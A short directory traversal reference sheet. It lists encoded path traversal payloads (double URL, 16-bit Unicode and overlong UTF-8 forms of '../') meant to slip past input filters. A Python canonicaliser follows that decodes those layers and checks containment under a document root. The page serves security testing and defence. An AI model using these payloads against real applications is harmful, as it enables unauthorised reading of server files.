# Traversal Directory
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
## Exploit
Basic
```powershell
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
```
16 bit Unicode encoding
```powershell
. = %u002e
/ = %u2215
\ = %u2216
```
Double URL encoding
```powershell
. = %252e
/ = %252f
\ = %255c
```
UTF-8 Unicode encoding
```powershell
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
```
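As a defensive counterpart to the encodings listed above, here is an added example (not part of PayloadsAllTheThings): a canonicaliser that peels off each encoding layer listed on this page, including the overlong UTF-8 forms, and then checks whether the resolved path still lies under an assumed document root `ROOT`.

```python
import posixpath
import re

ROOT = "/srv/app/files"          # assumed document root, constructed for this example
PCT = re.compile(r"%([0-9a-fA-F]{2})")
UPCT = re.compile(r"%u([0-9a-fA-F]{4})")
FOLD = {0xFF0E: ".", 0x2215: "/", 0x2216: "\\"}   # 16-bit forms listed above -> ASCII


def percent_decode(s: str) -> bytes:
    """One layer of %uXXXX and %XX decoding; everything else passes through as UTF-8."""
    s = UPCT.sub(lambda m: FOLD.get(int(m.group(1), 16), chr(int(m.group(1), 16))), s)
    out, i = bytearray(), 0
    while i < len(s):
        m = PCT.match(s, i)
        if m:
            out.append(int(m.group(1), 16))
            i = m.end()
        else:
            out += s[i].encode("utf-8")
            i += 1
    return bytes(out)


def lenient_utf8(b: bytes) -> str:
    """Decode like a bit-masking decoder: no continuation-byte check, no rejection of
    overlong forms. That is what turns %c0%ae, %c0%2e and %e0%40%ae into '.', so a
    canonicaliser used for validation must be at least this permissive."""
    out, i = [], 0
    while i < len(b):
        c = b[i]
        if c < 0x80:
            out.append(chr(c)); i += 1
        elif 0xC0 <= c < 0xE0 and i + 1 < len(b):
            out.append(chr(((c & 0x1F) << 6) | (b[i + 1] & 0x3F))); i += 2
        elif 0xE0 <= c < 0xF0 and i + 2 < len(b):
            out.append(chr(((c & 0x0F) << 12) | ((b[i + 1] & 0x3F) << 6) | (b[i + 2] & 0x3F))); i += 3
        else:
            out.append("\ufffd"); i += 1          # truncated or 4-byte sequence: keep a marker
    return "".join(out)


def escapes_root(name: str, root: str = ROOT, rounds: int = 3) -> bool:
    """True if `name` resolves outside `root` after up to `rounds` decode layers (double
    URL encoding needs two). Nothing is stripped, so '..././' has no filter to fool."""
    cur = name
    for _ in range(rounds):
        nxt = lenient_utf8(percent_decode(cur))
        if nxt == cur:
            break
        cur = nxt
    target = posixpath.normpath(posixpath.join(root, cur.replace("\\", "/")))
    return posixpath.commonpath([root, target]) != root
```

Resolving and then checking containment is the check to keep; rejecting on the literal string `../` is what the variants above are built to get past.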
## References
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)